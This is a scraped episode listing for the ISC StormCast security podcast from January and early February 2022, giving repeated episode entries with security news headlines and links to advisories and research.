Intuit warns of new phishing scams https://security.intuit.com/security-notices IRS working with ID.me https://www.irs.gov/newsroom/new-identity-verification-process-to-access-certain-irs-online-tools-and-services Argo CD Vulnerability https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ https://github.com/argoproj/argo-cd/security/advisories/GHSA-63qx-x74g-jcr7 Thermal Imaging of PoE Devices https://isc.sans.edu/forums/diary/Power+over+Ethernet+and+Thermal+Imaging/28308/
2/7/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, February 4th, 2022

Attack Surface Detection https://isc.sans.edu/forums/diary/Keeping+Track+of+Your+Attack+Surface+for+Cheap/28304/ MFA News https://www.proofpoint.com/us/blog/threat-insight/mfa-psa-oh-my https://news.microsoft.com/wp-content/uploads/prod/sites/626/2022/02/Cyber-Signals-E-1.pdf Zimbra Webmail 0-Day Exploited https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/ Cisco RV Series Routers Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D
2/4/20225 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, February 4th, 2022

Attack Surface Detection https://isc.sans.edu/forums/diary/Keeping+Track+of+Your+Attack+Surface+for+Cheap/28304/ MFA News https://www.proofpoint.com/us/blog/threat-insight/mfa-psa-oh-my https://news.microsoft.com/wp-content/uploads/prod/sites/626/2022/02/Cyber-Signals-E-1.pdf Zimbra Webmail 0-Day Exploited https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/ Cisco RV Series Routers Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D
2/4/20225 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, February 3rd, 2022

Finding elFinder: Who is looking for your files? https://isc.sans.edu/forums/diary/Finding+elFinder+Who+is+looking+for+your+files/28300/ IBM Spectrum Protect Plus Container Backup Vulnerabilities https://www.ibm.com/support/pages/node/6540860 https://www.ibm.com/support/pages/node/6552188 Microsoft Update Connectivity https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356 UEFI Bios Vulnerabilities https://www.insyde.com/security-pledge
2/3/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, February 3rd, 2022

Finding elFinder: Who is looking for your files? https://isc.sans.edu/forums/diary/Finding+elFinder+Who+is+looking+for+your+files/28300/ IBM Spectrum Protect Plus Container Backup Vulnerabilities https://www.ibm.com/support/pages/node/6540860 https://www.ibm.com/support/pages/node/6552188 Microsoft Update Connectivity https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356 UEFI Bios Vulnerabilities https://www.insyde.com/security-pledge
2/3/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, February 2nd, 2022

Windows Privilege Escalation Exploit CVE-2022-21882 https://github.com/KaLendsi/CVE-2022-21882 Fingerprinting Devices Via GPU https://arxiv.org/pdf/2201.09956.pdf SolarMarker Campaign used novel registry changes to establish persistence https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/ Fake Job Ads https://www.ic3.gov/Media/Y2022/PSA220201 Automation is Nice But Don't Replace Your Knowledge https://isc.sans.edu/forums/diary/Automation+is+Nice+But+Dont+Replace+Your+Knowledge/28296/
2/2/20225 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, February 2nd, 2022

Windows Privilege Escalation Exploit CVE-2022-21882 https://github.com/KaLendsi/CVE-2022-21882 Fingerprinting Devices Via GPU https://arxiv.org/pdf/2201.09956.pdf SolarMarker Campaign used novel registry changes to establish persistence https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/ Fake Job Ads https://www.ic3.gov/Media/Y2022/PSA220201 Automation is Nice But Don't Replace Your Knowledge https://isc.sans.edu/forums/diary/Automation+is+Nice+But+Dont+Replace+Your+Knowledge/28296/
2/2/20225 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, February 1st, 2022

Be Careful with RPMSG Files https://isc.sans.edu/forums/diary/Be+careful+with+RPMSG+files/28292/ QNAP Auto Update Clarification https://www.qnap.com/en/security-news/2022/descriptions-and-explanations-of-the-qts-quts-hero-recommended-version-feature Samba Vulnerability https://kb.cert.org/vuls/id/119678 Exposed Datacenter Management https://www.bleepingcomputer.com/news/security/over-20-000-data-center-management-systems-exposed-to-hackers/ Expat Vulnerability https://github.com/libexpat/libexpat/blob/master/expat/Changes
2/1/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, February 1st, 2022

Be Careful with RPMSG Files https://isc.sans.edu/forums/diary/Be+careful+with+RPMSG+files/28292/ QNAP Auto Update Clarification https://www.qnap.com/en/security-news/2022/descriptions-and-explanations-of-the-qts-quts-hero-recommended-version-feature Samba Vulnerability https://kb.cert.org/vuls/id/119678 Exposed Datacenter Management https://www.bleepingcomputer.com/news/security/over-20-000-data-center-management-systems-exposed-to-hackers/ Expat Vulnerability https://github.com/libexpat/libexpat/blob/master/expat/Changes
2/1/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, January 31st, 2022

Malicious ISO Embedded in an HTML Page https://isc.sans.edu/forums/diary/Malicious+ISO+Embedded+in+an+HTML+Page/28282/ YARA Console Module https://isc.sans.edu/forums/diary/YARAs+Console+Module/28288/ Attackers Attaching Devices to Azure AD https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/ QNAP Forced Updates https://www.reddit.com/r/qnap/comments/sdsf02/i_just_suffered_what_i_believe_to_be_a_forced/huhfmjc/
1/31/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, January 31st, 2022

Malicious ISO Embedded in an HTML Page https://isc.sans.edu/forums/diary/Malicious+ISO+Embedded+in+an+HTML+Page/28282/ YARA Console Module https://isc.sans.edu/forums/diary/YARAs+Console+Module/28288/ Attackers Attaching Devices to Azure AD https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/ QNAP Forced Updates https://www.reddit.com/r/qnap/comments/sdsf02/i_just_suffered_what_i_believe_to_be_a_forced/huhfmjc/
1/31/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, January 28th, 2022

Technical Analysis of CVE-2022-22583 https://perception-point.io/technical-analysis-of-cve-2022-22583-bypassing-macos-system-integrity-protection/ https://isc.sans.edu/forums/diary/Apple+Patches+Everything/28280/ Little Snitch Firewall Bypass https://rhinosecuritylabs.com/network-security/bypassing-little-snitch-firewall/ DazzleSpy Malware https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/ Geoffrey Parker: Building an Intelligent, Automated Tiered Phishing System https://www.sans.edu/cyber-research/building-an-intelligent-automated-tiered-phishing-system-matching-the-message-level-to-user-ability/
1/28/202216 minutes
Episode Artwork

ISC StormCast for Friday, January 28th, 2022

Technical Analysis of CVE-2022-22583 https://perception-point.io/technical-analysis-of-cve-2022-22583-bypassing-macos-system-integrity-protection/ https://isc.sans.edu/forums/diary/Apple+Patches+Everything/28280/ Little Snitch Firewall Bypass https://rhinosecuritylabs.com/network-security/bypassing-little-snitch-firewall/ DazzleSpy Malware https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/ Geoffrey Parker: Building an Intelligent, Automated Tiered Phishing System https://www.sans.edu/cyber-research/building-an-intelligent-automated-tiered-phishing-system-matching-the-message-level-to-user-ability/
1/28/202216 minutes
Episode Artwork

ISC StormCast for Thursday, January 27th, 2022

Over 20 Thousand Servers Have Their iLO Interfaces exposed to the Internet https://isc.sans.edu/forums/diary/Over+20+thousand+servers+have+their+iLO+interfaces+exposed+to+the+internet+many+with+outdated+and+vulnerable+versions+of+FW/28276/ Apple Patches and Exploits https://support.apple.com/en-us/HT201222 https://www.ryanpickren.com/safari-uxss Let's Encrypt Fixes Problems and Revoces Certificates https://community.letsencrypt.org/t/changes-to-tls-alpn-01-challenge-validation/170427
1/27/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, January 27th, 2022

Over 20 Thousand Servers Have Their iLO Interfaces exposed to the Internet https://isc.sans.edu/forums/diary/Over+20+thousand+servers+have+their+iLO+interfaces+exposed+to+the+internet+many+with+outdated+and+vulnerable+versions+of+FW/28276/ Apple Patches and Exploits https://support.apple.com/en-us/HT201222 https://www.ryanpickren.com/safari-uxss Let's Encrypt Fixes Problems and Revoces Certificates https://community.letsencrypt.org/t/changes-to-tls-alpn-01-challenge-validation/170427
1/27/20226 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, January 26th, 2022

Local Privilege Escalation Vulnerablity in Polkit's pkexec (CVE-2021-4034) https://isc.sans.edu/forums/diary/Local+privilege+escalation+vulnerability+in+polkits+pkexec+CVE20214034/28272/ Emotet Stops Using 0.0.0.0 in Spambot Traffic https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/ VMWare Warns of Log4j Exploitation https://www.vmware.com/security/advisories/VMSA-2021-0028.html https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/
1/26/20225 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, January 26th, 2022

Local Privilege Escalation Vulnerablity in Polkit's pkexec (CVE-2021-4034) https://isc.sans.edu/forums/diary/Local+privilege+escalation+vulnerability+in+polkits+pkexec+CVE20214034/28272/ Emotet Stops Using 0.0.0.0 in Spambot Traffic https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/ VMWare Warns of Log4j Exploitation https://www.vmware.com/security/advisories/VMSA-2021-0028.html https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/
1/26/20225 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, January 25th, 2022

Moonbound UEFI Malware https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ Exploit of Sonicwall CVE-2021-20038 https://twitter.com/buffaloverflow/status/1485671824725786633 Dell EMC AppSync Vulnerability https://www.dell.com/support/kbdoc/de-de/000195377/dsa-2022-003-dell-emc-appsync-security-update-for-multiple-vulnerabilities Twitter API Keys Leaked in GitHub https://incognitatech.medium.com/using-twitter-to-notify-careless-developers-the-unorthodox-way-d71478ad367a
1/25/20226 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, January 25th, 2022

Moonbound UEFI Malware https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ Exploit of Sonicwall CVE-2021-20038 https://twitter.com/buffaloverflow/status/1485671824725786633 Dell EMC AppSync Vulnerability https://www.dell.com/support/kbdoc/de-de/000195377/dsa-2022-003-dell-emc-appsync-security-update-for-multiple-vulnerabilities Twitter API Keys Leaked in GitHub https://incognitatech.medium.com/using-twitter-to-notify-careless-developers-the-unorthodox-way-d71478ad367a
1/25/20226 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, January 24th, 2022

Obscure Wininet.dll Feature https://isc.sans.edu/forums/diary/Obscure+Wininetdll+Feature/28262/ Mixed VBA and Excel 4 Macro in Targeted Excel Sheet https://isc.sans.edu/forums/diary/Mixed+VBA+Excel4+Macro+In+a+Targeted+Excel+Sheet/28264/ https://techcommunity.microsoft.com/t5/excel-blog/excel-4-0-xlm-macros-now-restricted-by-default-for-customer/ba-p/3057905 F5 January 2022 Patches https://support.f5.com/csp/article/K40084114 McAfee Privilege Escalation https://kc.mcafee.com/corporate/index?page=content&id=SB10378
1/24/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, January 24th, 2022

Obscure Wininet.dll Feature https://isc.sans.edu/forums/diary/Obscure+Wininetdll+Feature/28262/ Mixed VBA and Excel 4 Macro in Targeted Excel Sheet https://isc.sans.edu/forums/diary/Mixed+VBA+Excel4+Macro+In+a+Targeted+Excel+Sheet/28264/ https://techcommunity.microsoft.com/t5/excel-blog/excel-4-0-xlm-macros-now-restricted-by-default-for-customer/ba-p/3057905 F5 January 2022 Patches https://support.f5.com/csp/article/K40084114 McAfee Privilege Escalation https://kc.mcafee.com/corporate/index?page=content&id=SB10378
1/24/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, January 21st, 2022

RedLine Stealer Delivered Through FTP https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/ Google Camera Alters QR Codes https://www.heise.de/hintergrund/Googles-Kamera-verfaelscht-Links-in-QR-Codes-6332669.html https://www.androidpolice.com/google-camera-randomly-changes-some-qr-code-urls-on-android-12/ Linux Kernel Privilege Escalation / Container Escape https://seclists.org/oss-sec/2022/q1/54 https://access.redhat.com/security/cve/cve-2022-0185 Crypto.com 2FA Bypass https://threatpost.com/2fa-bypassed-crypto-com-heist/177846/ Windows Policies to Avoid https://techcommunity.microsoft.com/t5/windows-it-pro-blog/why-you-shouldn-t-set-these-25-windows-policies/ba-p/3066178
1/21/20226 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, January 21st, 2022

RedLine Stealer Delivered Through FTP https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/ Google Camera Alters QR Codes https://www.heise.de/hintergrund/Googles-Kamera-verfaelscht-Links-in-QR-Codes-6332669.html https://www.androidpolice.com/google-camera-randomly-changes-some-qr-code-urls-on-android-12/ Linux Kernel Privilege Escalation / Container Escape https://seclists.org/oss-sec/2022/q1/54 https://access.redhat.com/security/cve/cve-2022-0185 Crypto.com 2FA Bypass https://threatpost.com/2fa-bypassed-crypto-com-heist/177846/ Windows Policies to Avoid https://techcommunity.microsoft.com/t5/windows-it-pro-blog/why-you-shouldn-t-set-these-25-windows-policies/ba-p/3066178
1/21/20226 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, January 20th, 2022

0.0.0.0 in Emotet Spambot Traffic https://isc.sans.edu/forums/diary/0000+in+Emotet+Spambot+Traffic/28254/ Linux Patch to Make 0.0.0.0/8 Routable https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=96125bf9985a WebKit Patch for Cross Origin Database Name Leak https://trac.webkit.org/changeset/288078/webkit ACER Care Center Privilege Escalation https://aptw.tf/2022/01/20/acer-care-center-privesc.html Imporper Input Validation Vulnerability in Serv-U https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247
1/20/20226 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, January 20th, 2022

0.0.0.0 in Emotet Spambot Traffic https://isc.sans.edu/forums/diary/0000+in+Emotet+Spambot+Traffic/28254/ Linux Patch to Make 0.0.0.0/8 Routable https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=96125bf9985a WebKit Patch for Cross Origin Database Name Leak https://trac.webkit.org/changeset/288078/webkit ACER Care Center Privilege Escalation https://aptw.tf/2022/01/20/acer-care-center-privesc.html Imporper Input Validation Vulnerability in Serv-U https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247
1/20/20226 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, January 19th, 2022

Phishing E-Mail With an Advertisement https://isc.sans.edu/forums/diary/Phishing+email+withan+advertisement/28250/ Virustotal Credential https://www.safebreach.com/blog/2022/the-perfect-cyber-crime/ Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujan2022.html Box MFA Bypass https://www.varonis.com/blog/box-mfa-bypass-sms
1/19/20225 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, January 19th, 2022

Phishing E-Mail With an Advertisement https://isc.sans.edu/forums/diary/Phishing+email+withan+advertisement/28250/ Virustotal Credential https://www.safebreach.com/blog/2022/the-perfect-cyber-crime/ Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujan2022.html Box MFA Bypass https://www.varonis.com/blog/box-mfa-bypass-sms
1/19/20225 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, January 18th, 2022

Log4Shell Attacks Getting Smarter https://isc.sans.edu/forums/diary/Log4Shell+Attacks+Getting+Smarter/28246/ Microsoft Releases Special Update to Deal with January Update Fail https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-oob-updates-for-january-windows-update-issues/ Cisco Unified Contact Center Management Portal and Unifed Contact Center Domain Manager Privilege Escalation Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccmp-priv-esc-JzhTFLm4 Zoho Critical Security Patch Released in Desktop Central and Desktop Central MSP https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022 Google Chrome Restricting Private Network Access https://developer.chrome.com/blog/private-network-access-preflight/
1/18/20225 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, January 18th, 2022

Log4Shell Attacks Getting Smarter https://isc.sans.edu/forums/diary/Log4Shell+Attacks+Getting+Smarter/28246/ Microsoft Releases Special Update to Deal with January Update Fail https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-oob-updates-for-january-windows-update-issues/ Cisco Unified Contact Center Management Portal and Unifed Contact Center Domain Manager Privilege Escalation Vulnerablity https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccmp-priv-esc-JzhTFLm4 Zoho Critical Security Patch Released in Desktop Central and Desktop Central MSP https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022 Google Chrome Restricting Private Network Access https://developer.chrome.com/blog/private-network-access-preflight/
1/18/20225 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, January 17th, 2022

Use of Alternate Data Streams in Research Scans https://isc.sans.edu/forums/diary/Use+of+Alternate+Data+Streams+in+Research+Scans+for+indexjsp/28240/ Microsoft Resumes Windows Server 2019 Cumulative Updates https://www.bleepingcomputer.com/news/microsoft/microsoft-resumes-rollout-of-january-windows-server-updates/ Safari Index DB Leak https://fingerprintjs.com/blog/indexeddb-api-browser-vulnerability-safari-15/
1/17/20225 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, January 17th, 2022

Use of Alternate Data Streams in Research Scans https://isc.sans.edu/forums/diary/Use+of+Alternate+Data+Streams+in+Research+Scans+for+indexjsp/28240/ Microsoft Resumes Windows Server 2019 Cumulative Updates https://www.bleepingcomputer.com/news/microsoft/microsoft-resumes-rollout-of-january-windows-server-updates/ Safari Index DB Leak https://fingerprintjs.com/blog/indexeddb-api-browser-vulnerability-safari-15/
1/17/20225 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, January 14th, 2022

MSFT Patch Issues https://borncity.com/win/2022/01/12/patchday-windows-8-1-server-2012-r2-updates-11-januar-2022-mgliche-boot-probleme/ https://support.microsoft.com/en-us/topic/january-11-2022-kb5009624-monthly-rollup-23f4910b-6bdd-475c-bb4d-c0e961aff0bc https://support.microsoft.com/en-us/topic/january-11-2022-kb5009595-security-only-update-060870c2-ad08-40e5-b000-a9f6d40c0831 Jenkins Security Advisory 2022-01-1 https://www.jenkins.io/security/advisory/2022-01-12/ Qakbot Configuration Decryptor https://github.com/drole/qakbot-registry-decrypt Android allows Disabling 2G https://www.bleepingcomputer.com/news/security/android-users-can-now-disable-2g-to-block-stingray-attacks/ Weakness in Microsoft Defender https://twitter.com/splinter_code/status/1481073265380581381
1/14/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, January 14th, 2022

MSFT Patch Issues https://borncity.com/win/2022/01/12/patchday-windows-8-1-server-2012-r2-updates-11-januar-2022-mgliche-boot-probleme/ https://support.microsoft.com/en-us/topic/january-11-2022-kb5009624-monthly-rollup-23f4910b-6bdd-475c-bb4d-c0e961aff0bc https://support.microsoft.com/en-us/topic/january-11-2022-kb5009595-security-only-update-060870c2-ad08-40e5-b000-a9f6d40c0831 Jenkins Security Advisory 2022-01-1 https://www.jenkins.io/security/advisory/2022-01-12/ Qakbot Configuration Decryptor https://github.com/drole/qakbot-registry-decrypt Android allows Disabling 2G https://www.bleepingcomputer.com/news/security/android-users-can-now-disable-2g-to-block-stingray-attacks/ Weakness in Microsoft Defender https://twitter.com/splinter_code/status/1481073265380581381
1/14/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, January 13th, 2022

A Quick CVE-2022-21907 FAQ https://isc.sans.edu/forums/diary/A+Quick+CVE202221907+FAQ+work+in+progress/28234/ Details Released Regarding Patched Sonicwall Vulnerabilities https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/ iOS/iPad OS Fixing HomeKit Vulnerability / Private Relay issues https://support.apple.com/en-us/HT201222 https://www.macrumors.com/2022/01/12/apple-icloud-private-relay-ios-15-2/ Atticking RDP From Inside https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructre https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html
1/13/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, January 13th, 2022

A Quick CVE-2022-21907 FAQ https://isc.sans.edu/forums/diary/A+Quick+CVE202221907+FAQ+work+in+progress/28234/ Details Released Regarding Patched Sonicwall Vulnerabilities https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/ iOS/iPad OS Fixing HomeKit Vulnerability / Private Relay issues https://support.apple.com/en-us/HT201222 https://www.macrumors.com/2022/01/12/apple-icloud-private-relay-ios-15-2/ Atticking RDP From Inside https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructre https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html
1/13/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, January 12th, 2022

Microsoft Patch Tuesday - January 2022 https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+January+2022/28230/ Adobe Updates https://helpx.adobe.com/security.html
1/12/20226 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, January 12th, 2022

Microsoft Patch Tuesday - January 2022 https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+January+2022/28230/ Adobe Updates https://helpx.adobe.com/security.html
1/12/20226 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, January 11th, 2022

New MacOS Vulnerability Could Lead to Unauthorized User Data Access https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access Exploiting URL Parsers https://claroty.com/wp-content/uploads/2022/01/Exploiting-URL-Parsing-Confusion.pdf NPM libs "colors" and "faker" sabotaged by developer https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/
1/11/20225 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, January 11th, 2022

New MacOS Vulnerability Could Lead to Unauthorized User Data Access https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access Exploiting URL Parsers https://claroty.com/wp-content/uploads/2022/01/Exploiting-URL-Parsing-Confusion.pdf NPM libs "colors" and "faker" sabotaged by developer https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/
1/11/20225 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, January 10th, 2022

Extracting Cobalt Strike Beacons from MSBuild Scripts https://isc.sans.edu/forums/diary/Extracting+Cobalt+Strike+Beacons+from+MSBuild+Scripts/28200/ The JNDI Strikes Back: Unauthenticated RCE in H2 Database Console https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/ Trojanized dnSpy app drops malware cocktail https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/ FIN7 Attackers Sending Malicious USB Sticks https://www.bleepingcomputer.com/news/security/fbi-hackers-use-badusb-to-target-defense-firms-with-ransomware/
1/10/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, January 10th, 2022

Extracting Cobalt Strike Beacons from MSBuild Scripts https://isc.sans.edu/forums/diary/Extracting+Cobalt+Strike+Beacons+from+MSBuild+Scripts/28200/ The JNDI Strikes Back: Unauthenticated RCE in H2 Database Console https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/ Trojanized dnSpy app drops malware cocktail https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/ FIN7 Attackers Sending Malicious USB Sticks https://www.bleepingcomputer.com/news/security/fbi-hackers-use-badusb-to-target-defense-firms-with-ransomware/
1/10/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, January 7th, 2022

Malicious Python Script Targeting Chinese People https://isc.sans.edu/forums/diary/Malicious+Python+Script+Targeting+Chinese+People/28220/ Google Docs Comment Exploit Allows for Distribution of Phishing and Malware https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware Google Voice Authentication Scams https://www.fbi.gov/contact-us/field-offices/portland/news/press-releases/oregon-fbi-tech-tuesday-building-a-digital-defense-against-google-voice-authentication-scams Norton Crypto Miner https://investor.nortonlifelock.com/About/Investors/press-releases/press-release-details/2021/NortonLifeLock-Unveils-Norton-Crypto/default.aspx
1/7/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, January 7th, 2022

Malicious Python Script Targeting Chinese People https://isc.sans.edu/forums/diary/Malicious+Python+Script+Targeting+Chinese+People/28220/ Google Docs Comment Exploit Allows for Distribution of Phishing and Malware https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware Google Voice Authentication Scams https://www.fbi.gov/contact-us/field-offices/portland/news/press-releases/oregon-fbi-tech-tuesday-building-a-digital-defense-against-google-voice-authentication-scams Norton Crypto Miner https://investor.nortonlifelock.com/About/Investors/press-releases/press-release-details/2021/NortonLifeLock-Unveils-Norton-Crypto/default.aspx
1/7/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, January 6th, 2022

Code Reuse in the Malware Landscape https://isc.sans.edu/forums/diary/Code+Reuse+In+the+Malware+Landscape/28216/ ZLoader Campaign Exploiting Signature Verification Bug https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/ VMWare Virtual CD-Rom Vulnerability https://www.vmware.com/security/advisories/VMSA-2022-0001.html Honda Y2k22 Bug https://www.bleepingcomputer.com/news/technology/honda-acura-cars-hit-by-y2k22-bug-that-rolls-back-clocks-to-2002/
1/6/20225 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, January 6th, 2022

Code Reuse in the Malware Landscape https://isc.sans.edu/forums/diary/Code+Reuse+In+the+Malware+Landscape/28216/ ZLoader Campaign Exploiting Signature Verification Bug https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/ VMWare Virtual CD-Rom Vulnerability https://www.vmware.com/security/advisories/VMSA-2022-0001.html Honda Y2k22 Bug https://www.bleepingcomputer.com/news/technology/honda-acura-cars-hit-by-y2k22-bug-that-rolls-back-clocks-to-2002/
1/6/20225 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, January 5th, 2022

A Simple Batch File That Blocks People https://isc.sans.edu/forums/diary/A+Simple+Batch+File+That+Blocks+People/28212/ Windows Server Remote Desktop Emergency Update https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2772 Malicious Telegram Installer Includes Purple Fox Rootkit https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit Web Skimmer Campaign Targets Real Estate Websites https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/
1/5/20225 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, January 5th, 2022

A Simple Batch File That Blocks People https://isc.sans.edu/forums/diary/A+Simple+Batch+File+That+Blocks+People/28212/ Windows Server Remote Desktop Emergency Update https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2772 Malicious Telegram Installer Includes Purple Fox Rootkit https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit Web Skimmer Campaign Targets Real Estate Websites https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/
1/5/20225 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, January 4th, 2022

McAfee Phishing Campaign with a Nice Fake Scan https://isc.sans.edu/forums/diary/McAfee+Phishing+Campaign+with+a+Nice+Fake+Scan/28208/ Trend Micro Apex One Patch https://success.trendmicro.com/solution/000289996 E-commerce Bots Using Cheap Domain Registration Services https://threatpost.com/ecommerce-bots-domain-registration-account-fraud/177305/ iOS Homekit DoS Vulnerability https://trevorspiniolas.com/doorlock/doorlock.html
1/4/20225 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, January 4th, 2022

